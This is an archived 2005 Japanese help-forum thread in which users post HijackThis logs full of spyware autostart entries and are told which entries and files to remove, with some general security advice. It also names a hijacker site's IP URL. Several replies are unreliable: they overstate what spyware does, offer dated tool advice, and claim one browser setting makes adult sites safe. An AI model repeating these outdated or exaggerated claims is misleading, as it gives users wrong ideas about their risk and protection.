O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [NECMFK] C:\Program Files\necmfk\necmfk.exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [SHRunOnce] C:\Program Files\SmartHobby\SHRunOnce.exe
O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [iTunesHelper] C:\Program Files\iTunes\iTunesHelper.exe
O4 - HKLM\..\Run: [msci] C:\DOCUME~1\jun\LOCALS~1\Temp\200521134256_mcinfo.exe /insfin

179 :158:05/02/17 00:00:58 ID:???
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [DAEMON Tools-1033] "C:\Program Files\D-Tools\daemon.exe" -lang 1033
O4 - HKLM\..\Run: [Microsofts MediaScope] winmep.exe
O4 - HKLM\..\Run: [MicroSoft Windows Explorer TM] explore.r.exe
O4 - HKLM\..\Run: [Windows Messenger Service] winsmsgr.exe
O4 - HKLM\..\Run: [*windows update] wsctl.exe
O4 - HKLM\..\Run: [AdTools Service] C:\Program Files\AdTools Service\AdTools.exe
O4 - HKLM\..\Run: [ap9h4qmo] C:\WINDOWS\System32\ap9h4qmo.exe
O4 - HKLM\..\Run: [cos] cos.exe
O4 - HKLM\..\Run: [IST Service] C:\Program Files\ISTsvc\istsvc.exe
O4 - HKLM\..\Run: [Gjoi] C:\WINDOWS\mceia.exe
O4 - HKLM\..\Run: [Internet Optimizer] "C:\Program Files\Internet Optimizer\optimize.exe"
O4 - HKLM\..\Run: [sais] c:\program files\180solutions\sais.exe
O4 - HKLM\..\Run: [wvyhgdqp] C:\WINDOWS\wvyhgdqp.exe
O4 - HKLM\..\Run: [WebRebates0] "C:\Program Files\Web_Rebates\WebRebates0.exe"
O4 - HKLM\..\RunServices: [Microsofts MediaScope] winmep.exe
O4 - HKLM\..\RunServices: [MicroSoft Windows Explorer TM] explore.r.exe
O4 - HKLM\..\RunServices: [Windows Messenger Service] winsmsgr.exe
O4 - HKLM\..\RunServices: [*windows update] wsctl.exe

180 :158:05/02/17 00:01:33 ID:???
O4 - HKLM\..\RunServices: [cos] cos.exe
O4 - HKLM\..\RunOnce: [MicroSoft Windows Explorer TM] explore.r.exe
O4 - HKLM\..\RunOnce: [djtopr1150.exe] "C:\DOCUME~1\jun\LOCALS~1\Temp\djtopr1150.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [SearchM] C:\Program Files\SmartHobby\PlugIn\CopyFromDigitalCamera\SearchM.exe
O4 - HKCU\..\Run: [MicroSoft Windows Explorer TM] explore.r.exe
O4 - HKCU\..\Run: [*windows update] wsctl.exe
O4 - HKCU\..\Run: [cos] cos.exe
O4 - HKCU\..\RunOnce: [MicroSoft Windows Explorer TM] explore.r.exe
O4 - HKCU\..\RunOnce: [DeleteSlotchBar] rundll32.exe advpack.dll,DelNodeRunDLL32 "C:\Program Files\ISTbar\istbar.dll"
O8 - Extra context menu item: Web Rebates - file://C:\Program Files\Web_Rebates\Sy1150\Tp1150\scri1150a.htm
O14 - IERESET.INF: START_PAGE_URL=http://www.biglobe.ne.jp/
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.com/v5consumer/V5Controls/en/x86/client/wuweb_site.cab?1108555820022
O17 - HKLM\System\CCS\Services\Tcpip\..\{E778A62A-D6EF-4F49-B1C7-A1518D8D3F03}: NameServer = 210.196.3.183 210.141.112.163
O23 - Service: *windows update - Unknown owner - C:\WINDOWS\System32\wsctl.exe

181 :158:05/02/17 00:02:11 ID:???
O23 - Service: Apache - Unknown owner - C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice (file missing)
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: DiXiM Media Server - Unknown owner - C:\Program Files\DigiOn\DiXiM Media Server\dmsf.exe
O23 - Service: iPod Service (iPodService) - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: NT Meter - Unknown owner - C:\WINDOWS\system32\NTMETER.EXE
O23 - Service: PACSPTISVR - Unknown owner - C:\Program Files\Common Files\Sony Shared\AVLib\Pacsptisvr.exe
O23 - Service: BroadPass Manager (Poling_Service) - 日本電気株式会社 - c:\Program Files\BIGLOBE\BroadPass\base\base.exe
O23 - Service: ReadSector (ReadSctService) - Unknown owner - C:\Smdata\ReadSctService.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\Sptisrv.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe


182 :158:05/02/17 00:04:14 ID:???
こんな感じで貼りつけてよろしかったでしょうか。
先ほどアドウェアとスパイボットで削除されていたであろう
ツールらしきものも復活している模様です・・・。

183 :ひよこ名無しさん:05/02/17 00:08:30 ID:???
なんて芸術的

184 :ひよこ名無しさん:05/02/17 00:09:02 ID:???
直んないよ

185 :158:05/02/17 00:11:05 ID:???
重症ですか、やはり・・・。

186 :たぬたんなりよ(=^u^=):05/02/17 00:17:30 ID:???
(=^u^=) これはかなりの重症なり・・・

187 :158:05/02/17 00:24:40 ID:???
今、実家に帰ってきていて以前は普通にネット出来ていたんです。
この間再インストールをして昨日ネットに繋げてゲームレビューサイト等を
ちょっと覗いていたらこんなハメに・・・。
セキュリティソフトを入れていなかったのが大きな原因なのでしょうか・・・?


188 :たぬたんなりよ(=^u^=):05/02/17 00:24:45 ID:???
>>185
(=^u^=) ちょっとこのまま普通に削除しても直りそうにないので一日貰えるなりか?
      明日の夜までには解決方法考えとくなり。

189 :ひよこ名無しさん:05/02/17 00:25:44 ID:???
>>187
自業自得だよ
今のうちにデータバックアップだけでも取っとけや

190 :たぬたんなりよ(=^u^=):05/02/17 00:26:34 ID:???
(=^u^=) たぬたんバカだから不明なものが結構あるなり・・・

191 :ひよこ名無しさん:05/02/17 00:27:54 ID:???
ネタ?

192 :ぼるじょあ ◆yBEncckFOU :05/02/17 00:28:05 ID:???
(・3・) エェー 和姦ないもんがいぱーいあるんだたRA リカバリすべきぢゃないNO? そんなまっしーん気持ちわるいC

193 :158:05/02/17 00:28:48 ID:???
>>188
そうですか、どうぞよろしくお願いします。
>>189
わかりました、どうもです。

194 :たぬたんなりよ(=^u^=):05/02/17 00:37:39 ID:???
>>193
(=^u^=) なんとかがんばってみるなり、とりあえずウィルススキャンするなり。


ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp

195 :ひよこ名無しさん:05/02/17 00:40:35 ID:???
ゴテゴテした画面なんだろうな‥

196 :ぼるじょあ ◆yBEncckFOU :05/02/17 00:56:52 ID:???

     ∧_∧     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  __ (  ・3・) _ < (・3・) エェー おとこはのーがーどですYO
⊂L/(ニ    ニ)\l⊃\__________________
  (   |  |   )
  )_/ つ |_(
    (_)(_)



197 :ひよこ名無しさん:05/02/17 01:05:10 ID:???
荒らすなバカ

198 :158:05/02/17 01:05:37 ID:???
ウィルススキャンして自分のPCの現状が分かりました・・・鬱。


199 :ひよこ名無しさん:05/02/17 01:06:37 ID:???
>>198
OK。膏デブゲット。
          ∧_∧
    ∧_∧  (´<_`  )  流石だよな俺ら。
   ( ´_ゝ`) /   ⌒i
   /   \     | |
  /    / ̄ ̄ ̄ ̄/ |
__(__ニつ/  FMV  / .| .|____
    \/____/ (u ⊃

200 :たぬたんなりよ(=^u^=):05/02/17 01:12:46 ID:???
>>198
(=^u^=) 結果を教えるなりよ。

201 :158:05/02/17 01:17:59 ID:???
ウィルスが232個発見され駆除できないのが三個ほどありました。
TR〜というのだったのでトロイ等と思われます。
セキュリティソフトの重要さを認識しました。

202 :たぬたんなりよ(=^u^=):05/02/17 01:24:14 ID:???
(=^u^=) そうなりか・・・わかったなり。
      今夜は遅いのでまた明日なり。

203 :ひよこ名無しさん:05/02/17 01:31:59 ID:EAda0MmE
こっちか
ウィルスかスパイウェアかわからんがなんか遣られたっぽいんです
別のPCからレスしてます

WindowsXP、ノートン使用、FWはFireFox。
Spybot、Ad-aware、SpywareBlaster、SpywareGuard、CWSearch入れてます

FireFoxのプログラムの所に「ミサ○○○(←293とか忘れたが数字)exe」
がやたらと通信許可求める、もちろん全部NOにしてる

タスクマネージャで「explore.exe.ExploreExtensions.exe」が量産される
自己増殖してるのかも。108個位あった

SafeModeで全部試したけど解決せず…orz
お願いします、、、誰か助けて…


204 :ひよこ名無しさん:05/02/17 01:46:17 ID:???
FWはFireFox

205 :ひよこ名無しさん:05/02/17 03:18:12 ID:m4zUtzaq
http://213.159.117.134/index.php
というサイトが勝手に立ち上がるようになってしまいました
どなたか解決策ご存知のかた教えてください!

206 :ひよこ名無しさん:05/02/17 04:33:38 ID:???
>>203
キンタマくさいな、P2Pやってるのか?
>>205
そのものだな
http://www.higaitaisaku.com/remove213159.html

207 :ひよこ名無しさん:05/02/17 12:16:30 ID:4cv1hIvt
画像を保存しようとしたらjpgのものがビットマップで保存になります。jpgに選択しようとしても候補に出てきません。
どうしたら直りますか?

208 :ひよこ名無しさん:05/02/17 12:18:15 ID:???
>>207
詳しく

209 :ひよこ名無しさん:05/02/17 12:18:17 ID:4BHQaivQ
メーカー名:SONYのVAIO
型番:VGC−V202RB
OS:WINDOWS XP HomeEdition SP2
ソフトウェア名:Internet Explorer
接続:光
起こった事:Internet Explorerで新しいウィンドウを表示しようとするとInternet Explorer
がフリーズしてタスクマネージャには実行中と書かれている
右クリックで新しいウィンドウで開くを選べばフリーズすることなく開ける
またグーグルで検索するとプログラムが応答しないとでて終了させられる
関係ありそうな事:その事が起こる前に何度も停電がありパソコンが終了させられていた

よろしくおねがいします。

210 :ひよこ名無しさん:05/02/17 12:20:14 ID:???
>>209
まずはchkdskやれ

211 :207:05/02/17 12:23:40 ID:4cv1hIvt
osはxpです。サイトで画像を右クリックで保存しようとしたらjpgのファイルにも関わらずファイルの種類がビットマップになります。候補にもjpgがなくなっています。

212 :ひよこ名無しさん:05/02/17 12:24:18 ID:???
>>211
禿げしく外出だよcen

213 :ひよこ名無しさん:05/02/17 12:26:07 ID:???
>>211
右クリックから保存しなきゃいいし、ビットマップになってもJPEGに変換すればいいと思う

214 :207:05/02/17 12:27:56 ID:4cv1hIvt
で直す方法はどうやればいいのでしょう?

215 :ひよこ名無しさん:05/02/17 12:31:37 ID:???
このスレに関係ないじゃん

216 :ひよこ名無しさん:05/02/17 12:39:28 ID:???
>>214
ここで調べろ。SP2なら他の原因もあるけどな。
http://support.microsoft.com/search/

217 :207:05/02/17 12:54:04 ID:4cv1hIvt
>>214
ありがとうございます。解決しました!

218 :207:05/02/17 13:01:36 ID:4cv1hIvt
間違えた。

>>216さんありがとうございます

219 :ひよこ名無しさん:05/02/17 13:31:39 ID:???
OS XPほーむ
オフラインで作業中いきなりfirefoxが起動、何事かと繋いでみたら金髪のおねいさんのはだかが表示
ホームページの設定はIE、OPERA、firefoxどれもが空白のまま
プロセスは全て見慣れたものでプロセス数はそれまでと変化なし
最後のアプデートは2月10日
spybotとノートン2004では異常なし

zonealarmの赤いアウトバウンドの方が急に増えてるので不安です

220 :219:05/02/17 13:33:51 ID:BBaigok+
癖でsageのままでした

221 :ひよこ名無しさん:05/02/17 17:32:36 ID:???
変なサイトを見たら、IEが狂ってしまいました。助けてください。
とにかくIEの状態がひどいんです。

・Windows Updateに接続すると必ずフリーズ
・そもそもIEを起動するたびにウイルスバスターが反応します
http://www.imgup.org/file/iup9220.jpg
↑こんなのが出てきます
9割は起動するだけでフリーズしてしまいます
・動作がかなり重い

最初はポップアップなどもあったんですが治りました。
でも上に書いた症状は全く治らないんです・・・
システムの復元もなぜか失敗してしまいます。
http://www7.plala.or.jp/asahikawa-ing/winxp_9.html
ここの方法も見てIEの再インストールをしようとしたんですが、これも無理でした。
別のブラウザはIEに慣れてしまったのでなるべく使いたくありません・・・

OSはXP、SP2です。誰か助けてください!

222 :たぬたんなりよ(=^u^=):05/02/17 19:39:16 ID:???
>>158>>201
(=^u^=) @ネットに接続した状態で以下をコンパネから削除、一つ削除する度に再起動するなり。
    削除できないものがあっても次に進むなり。古いマカフィーも捨てるなり

Internet Optimizer
ISTsvc
McAfee VirusScan
Uninstall 180searchAssistant
WebRebates
SlotchBar

(=^u^=) 怪しいエントリは一度バッサリ削除してみるなり、cos.exeに覚えはないなりね?
AHijackThis以外のウィンドウをすべて閉じ、下記エントリにチェックを入れてFix後、PCを再起動するなり。

R3 - URLSearchHook: (no name) - _{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)
O2 - BHO: BHObj Class - {00000010-6F7D-442C-93E3-4A4827C2E4C8} - C:\WINDOWS\nem220.dll
O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file)
O4 - HKLM\..\Run: [msci] C:\DOCUME~1\jun\LOCALS~1\Temp\200521134256_mcinfo.exe /insfin
O4 - HKLM\..\Run: [Microsofts MediaScope] winmep.exe
O4 - HKLM\..\Run: [MicroSoft Windows Explorer TM] explore.r.exe
O4 - HKLM\..\Run: [Windows Messenger Service] winsmsgr.exe
O4 - HKLM\..\Run: [AdTools Service] C:\Program Files\AdTools Service\AdTools.exe
O4 - HKLM\..\Run: [ap9h4qmo] C:\WINDOWS\System32\ap9h4qmo.exe
O4 - HKLM\..\Run: [cos] cos.exe
O4 - HKLM\..\Run: [IST Service] C:\Program Files\ISTsvc\istsvc.exe
O4 - HKLM\..\Run: [Gjoi] C:\WINDOWS\mceia.exe
O4 - HKLM\..\Run: [Internet Optimizer] "C:\Program Files\Internet Optimizer\optimize.exe"
O4 - HKLM\..\Run: [wvyhgdqp] C:\WINDOWS\wvyhgdqp.exe
O4 - HKLM\..\RunServices: [Microsofts MediaScope] winmep.exe
O4 - HKLM\..\RunServices: [MicroSoft Windows Explorer TM] explore.r.exe
O4 - HKLM\..\RunServices: [Windows Messenger Service] winsmsgr.exe
O4 - HKLM\..\RunServices: [*windows update] wsctl.exe

223 :たぬたんなりよ(=^u^=):05/02/17 19:40:38 ID:???
>>158
O4 - HKLM\..\RunServices: [cos] cos.exe
O4 - HKLM\..\RunOnce: [MicroSoft Windows Explorer TM] explore.r.exe
O4 - HKLM\..\RunOnce: [djtopr1150.exe] "C:\DOCUME~1\jun\LOCALS~1\Temp\djtopr1150.exe"
O4 - HKCU\..\Run: [MicroSoft Windows Explorer TM] explore.r.exe
O4 - HKCU\..\Run: [*windows update] wsctl.exe
O4 - HKCU\..\Run: [cos] cos.exe
O4 - HKCU\..\RunOnce: [MicroSoft Windows Explorer TM] explore.r.exe
O8 - Extra context menu item: Web Rebates - file://C:\Program Files\Web_Rebates\Sy1150\Tp1150\scri1150a.htm
O23 - Service: *windows update - Unknown owner - C:\WINDOWS\System32\wsctl.exe
O23 - Service: Apache - Unknown owner - C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice (file missing)

BIEを起動せずコントロールパネル→インターネットオプションからテンプレ>>2の1)2)

Cすべてのファイルを表示する設定にしてから、Fixエントリ関連フォルダ&ファイルの削除をするなり。
http://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jp_docid/20021217004140953
正規ファイルに似た名前のものもあるので注意するなり。

C:\WINDOWS\nem220.dll
C:\DOCUME~1\jun\LOCALS~1\Temp\200521134256_mcinfo.exe /insfin ←これはファイルだけ削除するなり。

沢山あるので以下略・・・解かるなりね?
念のため↓中身も捨てるなり、フォルダは捨てちゃダメなりよ。
C:\Windows\Temp
C:\Documents and Settings\jun\Local Settings\Temp

●念のためゴミ箱に10日位残しておくなり。

224 :たぬたんなりよ(=^u^=):05/02/17 19:41:58 ID:???
>>158
Dダメージクリーンナップサービス
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4700

ESpywareBlasterも入れてみるなり。
http://www.higaitaisaku.com/spywareblaster.html

(=^u^=) 他の回答者さんの意見も参考にしてみて下さいなりね。

225 :ひよこ名無しさん:05/02/17 20:02:32 ID:???
>>158
それでも直らない(ウィルスは消えたとしても、症状は回復しない)までに
システムがやられていたら、>>12-18を実行しなさい。
>12-13をちゃんと読んで意味を理解したら、>14-18をやりなさい。
>19はどちらでも良い。

226 :ひよこ名無しさん:05/02/17 20:03:36 ID:???
バスターのスパイウェア検索をしたら
SPYW_WEBHANCER.BとADW_SUPREBARというのが、みつかって
SPYW_WEBHANCER.Bの方は駆除できました。
ADW_SUPREBARの方は0件中0件駆除できましたって感じの文字が出て
そのまま残ります。
ADW_SUPREBARの方は、バスターで内容の詳細を検索しても出てきません。
(バスターで検索したら出てきたスパイウェアなのに何で?)
その後、何度かスパイウェアを検索したら、スパイウェアは見つかりませんでしたと出たり
また2つとも復活してたり、わけわかりません。
これってなんなんですか? ヤバイものなんですか?
ヤバイとしたらどうヤバイのか教えてください。
それとどうすれば消えるのかも・・・お願いします。
 
 


227 :ひよこ名無しさん:05/02/17 20:06:37 ID:???
今>158のサイトに行ってきましたがアクセスできませんでした。
まあブラウザのセキュリティを「高」に匹敵するレベルにしている所為だろう。

228 :たぬたんなりよ(=^u^=):05/02/17 20:08:10 ID:???
>>158
(=^u^=) 忘れたなり、テンプレ>>3の 6) 7)をセーフモードで必ず実行するなり。

      CoolWebSearch Ad-Aware SE Spybot1.3

229 :たぬたんなりよ(=^u^=):05/02/17 20:11:08 ID:???
>>226
(=^u^=) テンプレ>>3の 6) 7)をセーフモードでやるといいなり。

230 :ひよこ名無しさん:05/02/17 20:12:41 ID:???
>>226
スパイウェアというのは、お前が今ネットに接続している時に相手側のコンピュータから
お前のコンピュータを覗いたり重要ファイルを削除したり、キーボード操作を記録したり
マウスをリモートで操作したり、ブラウザを乗っ取りまともなサイトを見れなくしたり
時々広告を表示させたり(エロ系)コンピュータをフリーズさせたりと、一度そのスパイウェアが
入ってしまったら相手側のコンピュータがお前のコンピュータを完全に乗っ取ることができる。
だからスパイウェアと言う物は恐ろしい脅威なんですよ。
ウィルスよりもね。

231 :ひよこ名無しさん:05/02/17 20:33:52 ID:???
>>230
即レスありがとうございます。

えっ? じゃあ 今も誰かに見られたり、
勝手に操作されてるかもしれないってことですか?
マジで気持ち悪いんですけど・・・

だったら今ネットにつないでるのもヤバイですよね?

どうすれば直りますか?
それと誰の仕業(どこでついたのか)とかもわかりますか?
教えてください。お願いします。


232 :たぬたんなりよ(=^u^=):05/02/17 20:40:41 ID:???
>>231
(=^u^=) それをバスターが勝手に駆除してしまうと
     営業妨害になる恐れがあるなりよ、大人の事情なりw

      あるソフトウェアを無償で提供する代わりに、
      広告などを表示しますよと言う意味なり。

http://e-words.jp/w/E382A2E38389E382A6E382A7E382A2.html

駆除した後、SpywareBlasterで防げるなりよ。
http://www.higaitaisaku.com/spywareblaster.html

233 :ひよこ名無しさん:05/02/17 20:52:25 ID:???
>>232 たぬたんなりよ(=^u^=)様

ありがとうございます(PД`q。)


234 :ひよこ名無しさん:05/02/17 20:59:12 ID:???
SPYW_WEBHANCER.B スパイウェア

ADW_SUPREBAR アドウェア

235 :ひよこ名無しさん:05/02/17 21:00:39 ID:???
>>232
両方共アクセスできなかった・・・(´・ω・`)

236 :ひよこ名無しさん:05/02/17 21:05:15 ID:???
>>235
見れるよ。

237 :ひよこ名無しさん:05/02/17 21:12:09 ID:???
i ページを表示できません。ってでちゃうのです。

238 :ひよこ名無しさん:05/02/17 21:27:52 ID:???
なんでだろ?

239 :たぬたんなりよ(=^u^=):05/02/17 21:50:26 ID:???
>>237
(=^u^=) あれれ?不思議なりね、たぬたんの貼り方が悪いなりかね?

>>4のリンク先は普通に見れるなりか?

240 :ひよこ名無しさん:05/02/17 21:58:23 ID:???
まず、>>4のいちばん上のをやったら
アダルト対策の部屋っていうのが普通に出てきました。

>>232のアドレスは何度やっても「i ページを表示できません」
ってなっちゃいます。


241 :たぬたんなりよ(=^u^=):05/02/17 22:03:38 ID:???
(=^u^=) じゃあコピペしとくなりね

読み方 : アドウェア

 ユーザの画面に強制的に広告を表示させる代わりに、無料で利用できるソフトウェア。

 ソフトウェアの操作画面に直接広告を呼び出して表示するものや、
Webブラウザに「寄生」して一定の間隔で広告ウィンドウを表示させるものなどがある。

 また、ユーザのコンピュータの環境やWebブラウザのアクセス履歴などの情報を自社や顧客企業に通知し、
その結果を元に表示させる広告内容設定などに用いる機能を持つものもある。
こうしたソフトウェアは「スパイウェア」とも呼ばれる。

通常はソフトウェアに広告表示のための機能が内蔵されているが、
広告を表示する機能だけを持ったものもある。

そうしたアドウェアは他のソフトウェアとセットで配布され、
そのソフトウェアが無償で提供される代わりに、
ソフトウェアの起動中はアドウェアも動作するようになっている

242 :ひよこ名無しさん:05/02/17 22:05:10 ID:???
一定時間ごと(多分)に

Inbox Overload!
Warning! Your inbox may be overloaded with
unwanted junk mail. Stop spam,viruses,and unsavory
content bu clicking on the 'Update' button.

という表示のわざとらしい窓が出るんです…
窓のタイトルバーは Warning です
窓の中にダイアログボックスで上記の英文が出ててボタンがありますが
窓内のどこをクリックしてもどこかのサイトが開きます
サイトが表示されきる前に ×ボタンで閉じてるんですが
なんなんでしょうか…_| ̄|○

OSはXP IEは6.0 SP1
今朝方、ブラクラのような形で強制的にエロサイトに飛ばされて
ホームを書き換えられてしまってからの現象です
Ad-Aware と SpywareBlaster と CWShredder には何の反応もありません

243 :たぬたんなりよ(=^u^=):05/02/17 22:06:53 ID:???
読み方 : スパイウェア

 パソコンを使うユーザの行動や個人情報などを収集したり、
マイクロプロセッサの空き時間を借用して計算を行ったりするアプリケーションソフト。
得られたデータはマーケティング会社など、スパイウェアの作成元に送られる。

 スパイウェアは他のアプリケーションソフトとセットで配布され、
インストール時にはそのソフトと一括して利用条件の承諾などを求められる。
また、スパイウェアはユーザに気づかれないよう、ウィンドウなどを出さずにバックグラウンドで動作するため、
ユーザはスパイウェアがインストールされていることに気づきにくい。

 スパイウェアが行なう活動の内容は、実はインストール時に表示される利用条件の中に書かれているため、
インストール時にその利用条件を承諾してしまっている以上、スパイウェアの活動は直ちに違法と言えるものではない。
しかし、利用条件をまともに読む人はほとんどいないため、ほとんどのユーザはスパイウェアに気づかず、
スパイウェアごとソフトをインストールしてしまう。

 このため、スパイウェアは事実上無断で個人情報を収集しているとして、
プライバシー擁護団体などの消費者団体を中心に反スパイウェア活動が起こっている。
また、スパイウェアは一般ユーザの間でもおおむね不評で、特にパソコンの扱いに慣れ、
パソコンの動作を熟知しているユーザほどスパイウェアを嫌悪する傾向がある。

 なお、広告を表示する代わりに無料でソフトを利用できるアドウェアというものもあるが、
意味の上ではアドウェアとスパイウェアの間に直接関係はない。
しかし、アドウェアではユーザに表示する広告を選別するなどの目的で情報収集を行っていることが非常に多く、
かなりの割合のアドウェアがスパイウェアの機能を持っている。

244 :226:05/02/17 22:15:15 ID:???
他の人はちゃんと見れてるみたいなのにになんでだろう(´;ω;`)

>>たぬたんなりよ(=^u^=)様
>>234

いろいろ親切丁寧にご返答ありがとうございます。

とりあえず、これは、放っておいても、大きな問題はないってことで
大丈夫でしょうか? 
また何かあったら、よろしくお願いします。




245 :ひよこ名無しさん:05/02/17 22:17:31 ID:???
>>244
プロキシが書き換えられたままとかじゃないのかな。

246 :たぬたんなりよ(=^u^=):05/02/17 22:19:49 ID:???
>>244
(=^u^=) 多分心配ないなり。

247 :226:05/02/17 22:27:22 ID:???
いろいろありがとうございました。

風呂が沸いたので、いったん電源落とします。
後でまた来ます。

248 :PC初心者板”管理”運営責任者 ◆C3hGF5scDA :05/02/17 22:35:14 ID:???
>>247
> 風呂が沸いたので、いったん電源落とします。
このマターリ加減が吉と出るか凶と出るか、
今後に期待しています。


249 :ひよこ名無しさん:05/02/17 23:15:32 ID:???
では、どうしたらスパイウェア・アドウェアの感染を防ぐ事ができるのか?

良質なスパイウェア・アドウェア(まともな会社が行き過ぎたもの)は、インストールされるまえにちゃんと
「使用許諾所」というのを表示するので(英語の場合もあり)、それを一から最後まで何度も読み返して
意味が理解できたところで、その使用許諾所に「同意する」か「同意しない」かを選ぶ事ができる。
また、「同意する」しか選択肢が無い場合(ショックウェーブなど)は使用許諾所をちゃんと読めば、
何をすべきか自ずとわかってくる。

悪質なスパイウェア・アドウェア(エロ系)←これが本当に厄介。
セキュリティホールをついて勝手にそいつをインストールしたり、変なところに忍ばせて削除を難しく
したり、数分置きにエロサイトの広告を延々と出し続けたり、個人情報やパスワードを盗んだりする。
この悪質なやつは、俺も何度も感染している。
【アダルトサイト被害対策の部屋】→http://www.higaitaisaku.com/の助けを借りて駆除したこともある。

スパイウェア・アドウェアの感染を防ぐ最低限の手段

アンチウィルスソフトの常駐(複数のアンチウィルスの常駐は絶対×)
アンチウィルスソフトの役割=自分が使っているパソコンを自分の家だと思ってください。
泥棒(ウィルス)が侵入してきました。
ここで貴方の家に番犬が買われているかいないかで、あなたの家が被害に
遭うか遭わないかと言うものが分かると思います。
そうです。アンチウィルスソフトは番犬の役割をしてくれます。侵入者を見つけて追い払ってくれるのです。

ファイアーウォールソフトの使用
ファイアーウォールの役割=あなたはこれから家を留守にします。
家を留守にするとき、あなたは家中の窓や玄関を開けっ放しにしたまま外出できますか?
ちゃんと戸締りをして外出するでしょう。ファイアーウォールは家の戸締りと同じ役目を持っているのです。

250 :ひよこ名無しさん:05/02/17 23:16:15 ID:???
Windows Update
Windows Updateの役割=あなたは現在、家を留守にしています。
ちゃんと戸締りをしました。カギをかけました。
では、肝心のカギは壊れていたらどうなりますか?
簡単に泥棒に入られてしまいます。そうなる前にカギを修理しなくちゃいけませんね。
壊れたカギの修理をしてくれるのが、このWindows Updateなのです。

ブラウザのセキュリティ
ブラウザのセキュリティの役割=窓ガラスだと思ってください。
あなたは現在、家を留守にしています。戸締りをしてカギをかけました。
カギは新しいのに付け替えています。これで泥棒に入ることは無いだろうと
タカを括っていると思いがけない目に遭ってしまいます。
ガラスが割られたら泥棒に侵入されてしまいます。そこで割れないガラスを
入れる必要があります。それがブラウザのセキュリティの設定です。

自分は制限付きサイトのセキュリティレベルを「最高」(全ての項目を無効)に
しました。これは家の窓ガラスを「防爆ガラス」に変えるのと同じです。
「高」(通常の設定)では防爆ガラスではなく「防弾ガラス」になっていますが、
それでも困ったことはありません。念には念をです。

信頼済みサイト・イントラネットは「中」(規定の設定では、信頼済み=「低」
イントラ「中低」になっています)にしても困ることはありません。
万が一怪しいサイトが信頼済みサイトに登録されてしまうと、プログラムが
警告無しにどんどん入ってきます。
これらの設定を窓ガラスに例えるなら、低は「網戸」中低は「普通のガラス」
中は「強化ガラス」みたいな物です。もしも、レベルを「最低」(全ての項目を
有効)にすると「窓枠のみのガラス無し」状態になってしまいます。

251 :ひよこ名無しさん:05/02/17 23:17:00 ID:???
インターネットのセキュリティのレベルは、通常の設定では「中」になっていますが、
これでは「強化ガラス」と同じなので、先の尖ったハンマーを使えば簡単に
割ることができてしまいます。
そのようなことを防ぐために>>117のようにセキュリティレベルを設定して下さい。
117の設定では、使いづらいこともあるので無効にする項目は「ActiveX」
「JAVA」「スクリプト」のところ全てだけでいいです。
自分は117の設定に足して「IFRAME」も無効に設定しました。
このように設定するには、レベルのカスタマイズから設定しなければなりません。
また、この設定をセキュリティレベルで表すと「中高」(ありませんが)になります。
これを窓ガラスに例えるなら「防犯ガラス」です。
合わせガラスって存じないですか?自動車のフロントガラスがそうです。
強化ガラスを割るハンマーを使っても、ヒビが入るくらいです。

アンチスパイウェアソフト
アンチスパイウェアソフトの役割=なかなか帰らないウザったいお客さんを
強制的に送還してくれる便利な物だと思ってください。
ま、アンチスパイウェアソフトについては使い始めて間もないですので、
詳しい説明はしたくてもできません。

ソフトウェアの「使用許諾所」をちゃんと読むことも大事です。

252 :ひよこ名無しさん:05/02/17 23:19:50 ID:???
>>249-251ついでに>>117も逝ってよし!

253 :ひよこ名無しさん:05/02/17 23:23:13 ID:???
>249-250-251
お前のせいでPCが動かなくなったぞ。

254 :ひよこ名無しさん:05/02/17 23:27:39 ID:???
ノートン先生が反応したのですが?

255 :ひよこ名無しさん:05/02/17 23:42:39 ID:???
文章をまとめられない奴は自分自身が理解できていないからなんだよ。

256 :ひよこ名無しさん:05/02/18 00:14:52 ID:XisKGLNM
教えてください。
IEに「Search Bar」っていうのが表示されて、
プログラムの追加と削除から削除できないんですが
どうすればよろしいのでしょうか?

257 :ひよこ名無しさん:05/02/18 00:17:40 ID:???
>>256
調べて消せばいいとおもいます

258 :ひよこ名無しさん:05/02/18 00:18:47 ID:???
>>256
テンプレやれ

259 :ひよこ名無しさん:05/02/18 00:21:44 ID:XisKGLNM
>>258
やってみます。

260 :ぼるじょあ ◆yBEncckFOU :05/02/18 00:28:41 ID:wU1lDFP2
>>117>>249-251
(・3・) エェー だから>>121

IEのステータスバーをWクリッコ→インターネッツゾーン「高」

だけでエロサイト安全に見れますYO
何でこれが タ ブ ー になってるんだろNE
皆が知っちゃったら被害対策の商売あがったりになるからですKA?

